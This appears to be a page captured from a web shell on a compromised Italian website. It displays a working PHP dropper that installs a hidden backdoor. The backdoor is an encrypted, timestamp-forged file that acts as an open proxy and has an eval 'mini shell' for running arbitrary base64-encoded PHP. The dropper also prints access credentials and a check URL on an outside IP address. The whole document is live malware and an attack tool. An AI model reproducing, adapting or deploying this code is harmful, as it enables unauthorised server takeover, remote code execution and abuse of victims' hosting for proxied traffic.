Your IP : 216.73.216.139


Current Path : /srv/web/sites/trentinoplant.it/httpdocs/pub/
Upload File :
Current File : /srv/web/sites/trentinoplant.it/httpdocs/pub/nJjskdmls.txt

<?php
$outfile=isset($_REQUEST['outfile']) ? $_REQUEST['outfile'] : 'favorite.php';

$lfile=basename(__FILE__);
$wfile=basename($_SERVER["SCRIPT_NAME"]);

//$_REQUEST['test']=1;
if (($lfile==$wfile) && !isset($_REQUEST['test'])) {echo file_get_contents(__FILE__);die();}


if (!file_exists(dirname($outfile)) || !is_writable(dirname($outfile))) 
		{
		echo "No write permissions or directory not exists:" .dirname($outfile)."\n";
		exit();
		}


if (file_exists($outfile))@unlink($outfile);
file_put_contents($outfile,'');
$finode=fileinode($outfile);
$donor=filemtime('/etc/passwd');
$ctime=time();

$key1=md5($finode);
$key2=md5($ctime);
$key3=md5($key1.$key2);

#echo "$key1 $key2 $key3\n";



$start='';
for($i=0;$i<=rand(5,20);$i++) $start.=randinvis();
$start.="/*\n".generateRandomString(rand(20,100))."\n";

$end='';
for($i=0;$i<=rand(5,20);$i++) $end.=randinvis();
$end.="*/".randinvis();

/*
error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
ini_set('display_errors', 1);
*/
$proxy_code='header("Access-Control-Allow-Origin: *");
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");

$password='_PASSWORD_';

$thisfile=trim(preg_replace('/\(.*$/','', __FILE__));
$version='0.7fix2';


ini_set('opcache.enable', 0);
if (function_exists('opcache_invalidate'))
                {
                opcache_invalidate(__FILE__, true);
                opcache_invalidate($thisfile, true);
                }

$info=array(
	"type" => 'curl',
	"country_code" => 'n/a',
	'downspeed' => 'n/a',
        'version' => $version,
        'inode'   => fileinode($thisfile),
        'mtime'   => filectime($thisfile),
        'status'  => 'OK',
        'version' => $version,
        'path'  => $thisfile
           );

$act=md5($password.'action');
$act=(isset($_REQUEST[$act])) ? $_REQUEST[$act] : FALSE;
switch ($act) {
        case md5($password.'status'):
                $info['action']   = 'status';
                $info['loadavg']  = mreadfile('/proc/loadavg') ?  mreadfile('/proc/loadavg') : 'n/a';

		$reqinfo=request("https://ipwho.is/"); //return array($responseCode,$responseHeader,$responseBody)
                $ip_info=json_decode($reqinfo[2],TRUE);
                if (is_array($ip_info) && ($ip_info['success']==TRUE))
                                {
                        $info['ip']=$ip_info["ip"];
                        $info['country_code']=$ip_info["country_code"];
                                }
		$repl=md5($password.'action')."=".md5($password.'status');
		$_SERVER["QUERY_STRING"]=str_replace("$repl&","",$_SERVER["QUERY_STRING"]);
		$_SERVER["QUERY_STRING"]=str_replace("$repl","",$_SERVER["QUERY_STRING"]);
                mp($info,$_SERVER["QUERY_STRING"]);
                break;

        case md5($password.'eval'):
                $code=isset($_REQUEST['picture']) ? base64_decode($_REQUEST['picture']) : FALSE;
                if ($code)
                        {
                $info['action']   = 'evalcode';
                try     {
                        eval($code);
                        } catch (Exception $e) {
                $info['status']  = 'FAILED';
                $info['exception']  = $e->getMessage();
                $info['rawcode']  = $code;
                                                }
                        }
                mp($info);
                break;
                }


    if (!function_exists('http_response_code')) {
        function http_response_code($code = NULL) {

            if ($code !== NULL) {

                switch ($code) {
                    case 100: $text = 'Continue'; break;
                    case 101: $text = 'Switching Protocols'; break;
                    case 200: $text = 'OK'; break;
                    case 201: $text = 'Created'; break;
                    case 202: $text = 'Accepted'; break;
                    case 203: $text = 'Non-Authoritative Information'; break;
                    case 204: $text = 'No Content'; break;
                    case 205: $text = 'Reset Content'; break;
                    case 206: $text = 'Partial Content'; break;
                    case 300: $text = 'Multiple Choices'; break;
                    case 301: $text = 'Moved Permanently'; break;
                    case 302: $text = 'Moved Temporarily'; break;
                    case 303: $text = 'See Other'; break;
                    case 304: $text = 'Not Modified'; break;
                    case 305: $text = 'Use Proxy'; break;
                    case 400: $text = 'Bad Request'; break;
                    case 401: $text = 'Unauthorized'; break;
                    case 402: $text = 'Payment Required'; break;
                    case 403: $text = 'Forbidden'; break;
                    case 404: $text = 'Not Found'; break;
                    case 405: $text = 'Method Not Allowed'; break;
                    case 406: $text = 'Not Acceptable'; break;
                    case 407: $text = 'Proxy Authentication Required'; break;
                    case 408: $text = 'Request Time-out'; break;
                    case 409: $text = 'Conflict'; break;
                    case 410: $text = 'Gone'; break;
                    case 411: $text = 'Length Required'; break;
                    case 412: $text = 'Precondition Failed'; break;
                    case 413: $text = 'Request Entity Too Large'; break;
                    case 414: $text = 'Request-URI Too Large'; break;
                    case 415: $text = 'Unsupported Media Type'; break;
                    case 500: $text = 'Internal Server Error'; break;
                    case 501: $text = 'Not Implemented'; break;
                    case 502: $text = 'Bad Gateway'; break;
                    case 503: $text = 'Service Unavailable'; break;
                    case 504: $text = 'Gateway Time-out'; break;
                    case 505: $text = 'HTTP Version not supported'; break;
                    default:
                        exit('Unknown http status code "' . htmlentities($code) . '"');
                    break;
                }
                $protocol = (isset($_SERVER['SERVER_PROTOCOL']) ? $_SERVER['SERVER_PROTOCOL'] : 'HTTP/1.0');
                header($protocol . ' ' . $code . ' ' . $text);
                $GLOBALS['http_response_code'] = $code;
            } else {
                $code = (isset($GLOBALS['http_response_code']) ? $GLOBALS['http_response_code'] : 200);
            }
            return $code;
        }
    }

function mp($arr='',$cont=FALSE)
        {
        echo json_encode($arr);
        if (!$cont) exit(0);
        }
function mreadfile($file='')
        {
        if (file_exists($file) && is_readable($file)) return file_get_contents($file);
        else return FALSE;
        }


function byte2($bytes) {
        $size = array('B/s','KB/s','MB/s','GB/s','TB/s');
        $factor = floor(log($bytes, 1024));
        $format = $factor > 2 ? '%.1F %s' : '%u %s';
        return sprintf($format, $bytes / pow(1024, $factor), $size[$factor]);
                        }

if (!function_exists('xor_string'))
  {

	function xor_string($string, $key) {
		$key=strval($string);
		$key=strval($key);
	    for($i = 0; $i < strlen($string); $i++) 
	        $string[$i] = ($string[$i] ^ $key[$i % strlen($key)]);
	    return $string;
					  }
  }


function request($targetUrl,$headers=array())
        {
global $info;
if (function_exists('curl_version')) {

	$headers[]="ORIG-TYPE: curl";
	$request = curl_init($targetUrl);
	curl_setopt_array($request, array(
	    CURLOPT_FOLLOWLOCATION => true,
	    CURLOPT_HEADER => true,
	    CURLOPT_RETURNTRANSFER => true,
	    CURLINFO_HEADER_OUT => true,
	    CURLOPT_HTTPHEADER => $headers,
	    CURLOPT_SSL_VERIFYPEER=>false,
	    CURLOPT_SSL_VERIFYHOST=>false
	));

	$response = curl_exec($request);
	$headerSize = curl_getinfo($request, CURLINFO_HEADER_SIZE);
	$responseHeader = substr($response, 0, $headerSize);
	$responseBody = substr($response, $headerSize);
	$responseInfo = curl_getinfo($request);
	$responseCode = ri($responseInfo['http_code'], 500);
	$redirectCount = ri($responseInfo['redirect_count'], 0);
	$requestHeaders = preg_split('/[\r\n]+/', ri($responseInfo['request_header'], ''));
	if ($responseCode === 0) {
	    $responseCode = 404;
	}
	
	$finalRequestURL = curl_getinfo($request, CURLINFO_EFFECTIVE_URL);
	if ($redirectCount > 0 && !empty($finalRequestURL)) {
	    $finalRequestURLParts = parse_url($finalRequestURL);
	    $effectiveURL = ri($finalRequestURLParts['scheme'], 'http') . '://' .
	        ri($finalRequestURLParts['host']) . ri($finalRequestURLParts['path'], '');
	}

	curl_close($request);
				     }
elseif (function_exists('stream_socket_client'))
		{
	$headers[]="ORIG-TYPE: ssc";
	$info['type']="ssc";
	$pu=parse_url($targetUrl);
	$pu['query'] = isset($pu['query']) ? '?'.$pu['query'] : '';
	$prefix = ($pu["scheme"]=='https') ? 'ssl://' : 'tcp://';

	$port = (isset($pu["port"])) ? $pu["port"] : NULL;
	if (!$port) $port = ($prefix=='ssl://') ? 443 : 80;
	$hostname = $prefix.$pu["host"].":$port";

	$context = stream_context_create(array(
	    'ssl' => array(
	        'verify_peer' => false,
	        'verify_peer_name' => false
			)
					));

	$fp = stream_socket_client($hostname, $errno, $errstr, ini_get("default_socket_timeout"), STREAM_CLIENT_CONNECT, $context);
	if(!$fp) die('NKDM');
	$host=parse_url($targetUrl, PHP_URL_HOST);
	$path=parse_url($targetUrl, PHP_URL_PATH);
#	$request= 'GET '.$path.$pu['query'].' '.$_SERVER['SERVER_PROTOCOL']."\r\n";
	$request= 'GET '.$path.$pu['query'].' '."HTTP/1.0\r\n";  
	$request.= "HOST: $host\r\n";
	$request.= "Connection: Close\r\n";
	$request.=implode("\r\n",$headers)."\r\n";
	$request.="\r\n\r\n";

	fputs($fp,$request);
	$isheader=TRUE;
	$responseHeader="";
	$responseBody="";


	    while (($line = fgets($fp)) !== false) {

		if ($isheader)
			{
		if ($responseHeader=='') list($http,$responseCode,$msg)=explode(' ',$line); //get http response code from first line
		if (strtolower(substr($line, 0, 14))==='content-length') continue;
		$responseHeader.=$line;
			}

		if (($line=="\r\n") && $isheader)	  {
				       $isheader=FALSE;
				       $line='';
				       continue;
			   	 			  }
				if (!$isheader) $responseBody.=$line;
	    					}
	 fclose($fp);
		}



	return array($responseCode,$responseHeader,$responseBody);
        }

function getIncomingRequestHeaders()
{
    $skippedHeaders=array(
        'HTTP_HOST',
        'HTTP_ACCEPT_ENCODING',
	'SERVER_SIGNATURE',
	'PATH',
	'LD_LIBRARY_PATH',
	'TEMP',
	'TMPDIR',
	'TMP',
	'USER',
	'HOME',
	'FCGI_ROLE',
    );
    $results = array();
    foreach ($_SERVER as $key => $value) {
        if (in_array($key, $skippedHeaders)) {
            continue;
        }

        $loweredKey = strtolower($key);
        if (strpos($loweredKey, 'http_') === 0) {
            // Remove prefix
            $key = substr($loweredKey, strlen('http_'));
                                                }
            // Replace underscores with dashes
            $key = str_replace('_', '-', $key);
            // Capital each word
            $key = ucwords($key);
		if (is_array($value)) continue;
                if (strpos($value,"\n")!==FALSE) continue;
            $results[] = "ORIG-"."$key: $value";

    }

    return $results;
}
function ri(&$variable, $default = null)
{
        if (isset($variable)) {
            return $variable;
        } else {
            return $default;
        }
}

function splitResponseHeaders($headerString)
{
    $results = array();
    $headerLines = preg_split('/[\r\n]+/', $headerString);
    foreach ($headerLines as $headerLine) {
        if (empty($headerLine)) {
            continue;
        }

        // Header contains HTTP version specification and path
        if (strpos($headerLine, 'HTTP/') === 0) {
            // Reset the output array as there may by multiple response headers
            $results = array();
            continue;
        }

        $results[] = "$headerLine";
    }

    return $results;
}

function rc4($str,$key) {
    if (empty($str)) return '';
    if (!is_string($str)) $str=strval($str);
        $s = array();
        for ($i = 0; $i < 256; $i++) {
                $s[$i] = $i;
        }
        $j = 0;
        for ($i = 0; $i < 256; $i++) {
                $j = ($j + $s[$i] + ord($key[$i % strlen($key)])) % 256;
                $x = $s[$i];
                $s[$i] = $s[$j];
                $s[$j] = $x;
        }
        $i = 0;
        $j = 0;
        $res = '';
        for ($y = 0; $y < strlen($str); $y++) {
                $i = ($i + 1) % 256;
                $j = ($j + $s[$i]) % 256;
                $x = $s[$i];
                $s[$i] = $s[$j];
                $s[$j] = $x;
                $res .= $str[$y] ^ chr($s[($s[$i] + $s[$j]) % 256]);
        }
        return $res;
}



if (!isset($_SERVER["DOCUMENT_ROOT"])) die();
if (isset($_SERVER['HTTPS'])) $proto='https';
	elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO'])) $proto=$_SERVER['HTTP_X_FORWARDED_PROTO'];
		else $proto='http';
$base=$proto."://".$_SERVER["HTTP_HOST"];
$base.=$_SERVER["SCRIPT_NAME"];
$targetUrl=rc4(base64_decode(rawurldecode($_SERVER["QUERY_STRING"])),$password);
//https://github.com/zounar/php-proxy/blob/master/Proxy.php
$headers = getIncomingRequestHeaders();
if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) $_SERVER["REMOTE_ADDR"] = $_SERVER["HTTP_CF_CONNECTING_IP"];
$headers[]="ORIG-IP: {$_SERVER["REMOTE_ADDR"]}";
$headers[]="ORIG-BASE: ".base64_encode($base);
$headers[]="ACCEPT: */*";

$cachedir=sys_get_temp_dir();
$randomize_output=FALSE;


$cached=false; //!!!!!!!!!!!!!!
$responseBody=NULL;
$cache_size=-1;



$pu=parse_url($targetUrl);
$ext=strtolower(pathinfo($pu["path"], PATHINFO_EXTENSION)); //СЃРѕС…СЂР°РЅСЏРµРј extnsion , Р±СѓРґСѓС‚ С„Р°Р№Р»С‹ РІРёРґР° __encoded__.ext 

if (isset($pu["query"]))
	{
	list($cache_file,$cache_size) = explode('-',base64_decode(rawurldecode($pu["query"])));
	if ((is_numeric($cache_size)) && (preg_match('/^[a-zA-Z0-9]*$/', $cache_file)))
				{
				$targetUrl=str_replace("?".$pu["query"],"",$targetUrl);
				$fcfp=$cachedir.'/'.$cache_file;
				}
	}

if ((in_array($ext,array('jpg','mp3','png','jpeg','bmp'))) && (isset($cache_file)) && (file_exists($fcfp)))
		{


	$cached=explode("\n",xor_string(file_get_contents($fcfp),$cache_file));
	$responseCode=xor_string(base64_decode($cached[0]),$cache_file);

	if ((count($cached)==3) && (is_numeric($responseCode)))
			{
			$responseHeader=xor_string(base64_decode($cached[1]),$cache_file);
			$responseBody=xor_string(base64_decode($cached[2]),$cache_file);
			$randomize_output=TRUE;
			}
		}

	if ((strlen($responseBody)!=$cache_size) || (!$cached))
		{
			$reqinfo=request($targetUrl,$headers); //return array($responseCode,$responseHeader,$responseBody) !!!!!!!!!!!!!!!!!!!!!!!!!!!!!

			$responseCode=strval($reqinfo[0]);
			$responseHeader=strval($reqinfo[1]);
			$responseBody=strval($reqinfo[2]);


	if (isset($fcfp))
		{
			$cached=base64_encode(xor_string($responseCode,$cache_file))."\n";
			$cached.=base64_encode(xor_string($responseHeader,$cache_file))."\n";
			$cached.=base64_encode(xor_string($responseBody,$cache_file));
		}

		if (($cached) && (isset($fcfp))) file_put_contents($fcfp,xor_string($cached,$cache_file)); //!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
		}


// Split header text into an array.
$responseHeaders = splitResponseHeaders($responseHeader);

// Pass headers to output
foreach ($responseHeaders as $header) {
    $headerParts = preg_split('/:\s+/', $header, 2);
    if (count($headerParts) !== 2) {
        continue;
    }

    $headerName = $headerParts[0];
    $loweredHeaderName = strtolower($headerName);

    $headerValue = $headerParts[1];
    $loweredHeaderValue = strtolower($headerValue);

    if (in_array($loweredHeaderName, array("url","primary_ip","primary-ip","certinfo","primary_port","primary-port","local_ip","local-ip","local_port","local-port")))
        continue;

    // Pass following headers to response
    if (in_array($loweredHeaderName,
        array('content-type', 'content-language', 'content-security', 'server'))) {
        header("$headerName: $headerValue");
    } elseif (strpos($loweredHeaderName, 'x-') === 0) {
        header("$headerName: $headerValue");
    } // Replace cookie domain and path
    elseif ($loweredHeaderName === 'set-cookie') {
        $newValue = preg_replace('/((?>domain)\s*=\s*)[^;\s]+/', '\1.' . $_SERVER['HTTP_HOST'], $headerValue);
        $newValue = preg_replace('/\s*;?\s*path\s*=\s*[^;\s]+/', '', $newValue);
        header("$headerName: $newValue", false);
    } // Decode response body if gzip encoding is used
    elseif ($loweredHeaderName === 'content-encoding' && $loweredHeaderValue === 'gzip') {
        $responseBody = gzdecode($responseBody);
    }
}

http_response_code($responseCode);
echo $responseBody;

/******** RANDOMIZE OUTPUT ********/
if ($randomize_output)
		{
	$rndchars=array("\r","\n","\t"," ",chr(0));
	for ($i=0;$i<=rand(3,15);$i++) echo $rndchars[array_rand($rndchars)];
		}
/******** RANDOMIZE OUTPUT ********/
die();';
$proxy_code=trim(base64_decode($proxy_code));
//$proxy_code=file_get_contents('code');

$domain=isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '';
$password=getpasswordhash($domain);
$proxy_code=str_replace('_PASSWORD_',$password,$proxy_code);

$proxy_code=$start.$end.$proxy_code;


$proxy_code=xor_string($proxy_code,$key1);
$proxy_code=xor_string($proxy_code,$key2);
$proxy_code=xor_string($proxy_code,$key3);

$randstart=generateRandomString(rand(5,10));
$proxy_code = wordwrap($randstart.base64_encode($proxy_code), 75, "\n", true);

$content="<?php
@error_reporting(0);

".'function xor_string($string, $key) {
	$string=strval($string);
	$key=strval($key);
    for($i = 0; $i < strlen($string); $i++) 
        $string[$i] = ($string[$i] ^ $key[$i % strlen($key)]);
    return $string;
}'."

@ini_set('opcache.enable', 0);
if (function_exists('opcache_invalidate')) 
		{
		@opcache_invalidate(__FILE__, true);
		}

\$key1=md5(fileinode(__FILE__));
\$key2=md5(filectime(__FILE__));
\$key3=md5(\$key1.\$key2);
\$prts=explode('$randstart',file_get_contents(__FILE__));
\$rawcode=end(\$prts);

\$code=base64_decode(\$rawcode);
\$code=xor_string(\$code,\$key3);
\$code=xor_string(\$code,\$key2);
\$code=xor_string(\$code,\$key1);
@eval(\$code);
?>\n$proxy_code";

file_put_contents($outfile,$content);
touch($outfile,$donor);


if (file_exists($outfile))
		{

//try {
	if (isset($_SERVER['HTTP_X_FORWARDED_PROTO'])) $proto=$_SERVER['HTTP_X_FORWARDED_PROTO'];
	else $proto=isset($_SERVER['HTTPS'])? 'https' : 'http';

	$realpath=realpath($outfile) ? realpath($outfile) :  getcwd().'/'.basename($outfile);
	$docroot = (substr($_SERVER['DOCUMENT_ROOT'],-1)=='/') ? substr($_SERVER['DOCUMENT_ROOT'],0,-1) : $_SERVER['DOCUMENT_ROOT'];
	$docroot = realpath($docroot) ? realpath($docroot) : $docroot;

	$base=$proto."://".$_SERVER["HTTP_HOST"];
	$www_proxy_path=str_replace($docroot,$base,$realpath);
	echo "Proxy_URL: $www_proxy_path\n";
//} catch (ExceptionType $e) {} 
//	finally {
	echo "Proxy_Password: '$password'\n";
	echo "Domain_md5('$domain'): $password\n"; //
	echo "Proxy LocalPath: $realpath\nInode: $finode Ctime: $ctime\n";
	$action_param=md5($password.'action');
	$status=md5($password.'status');
	$eva=md5($password.'eval');

$proxy_check_url='http://62.164.177.15/sosage.php';



echo "Status: $www_proxy_path?$action_param=$status (GET/POST)\n";
echo "Eval code(mini shell): "."$www_proxy_path?$action_param=$eva"."[&picture=ZWNobyAiSGVsbG8sIHdvcmxkIVxuIjs=] (php code in base64) (GET/POST)\n";
echo "Proxy Check Url: $proxy_check_url\n";

echo "Proxy OneTimeCheckUrl: $www_proxy_path?".rawurlencode(base64_encode(rc4("$proxy_check_url",$password)))."\n";
echo "Status_With_OneTimeCheckUrl: $www_proxy_path?$action_param=$status&".rawurlencode(base64_encode(rc4("$proxy_check_url",$password)))."\n";
//	}


		} else 
			{
			echo "Failed to create file: [".getcwd()."/$outfile]\n";
			}


#############################################################################
function getpasswordhash($domain)
	{	
	if (!$domain) return '';
/*
	$parts=explode('.',$domain);
	$hash='.'.end($parts);
	$hash=prev($parts).$hash;
	return md5($hash);
*/

	return md5($domain);
	}
#############################################################################
function randinvis()
	{
	$arr=array("\t","\n"," ");
	return $arr[array_rand($arr)];
	}
#==============================================
function xor_string($string, $key) {
	$key=strval($key);
    for($i = 0; $i < strlen($string); $i++) 
        $string[$i] = ($string[$i] ^ $key[$i % strlen($key)]);
    return $string;
}
#==============================================
function generateRandomString($length = 10) {
    $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, $charactersLength - 1)];
    }
    return $randomString;
}
#==============================================
function rc4($str,$key) {
    if (empty($str)) return '';
    if (!is_string($str)) $str=strval($str);
	$s = array();
	for ($i = 0; $i < 256; $i++) {
		$s[$i] = $i;
	}
	$j = 0;
	for ($i = 0; $i < 256; $i++) {
		$j = ($j + $s[$i] + ord($key[$i % strlen($key)])) % 256;
		$x = $s[$i];
		$s[$i] = $s[$j];
		$s[$j] = $x;
	}
	$i = 0;
	$j = 0;
	$res = '';
	for ($y = 0; $y < strlen($str); $y++) {
		$i = ($i + 1) % 256;
		$j = ($j + $s[$i]) % 256;
		$x = $s[$i];
		$s[$i] = $s[$j];
		$s[$j] = $x;
		$res .= $str[$y] ^ chr($s[($s[$i] + $s[$j]) % 256]);
	}
	return $res;
}
?>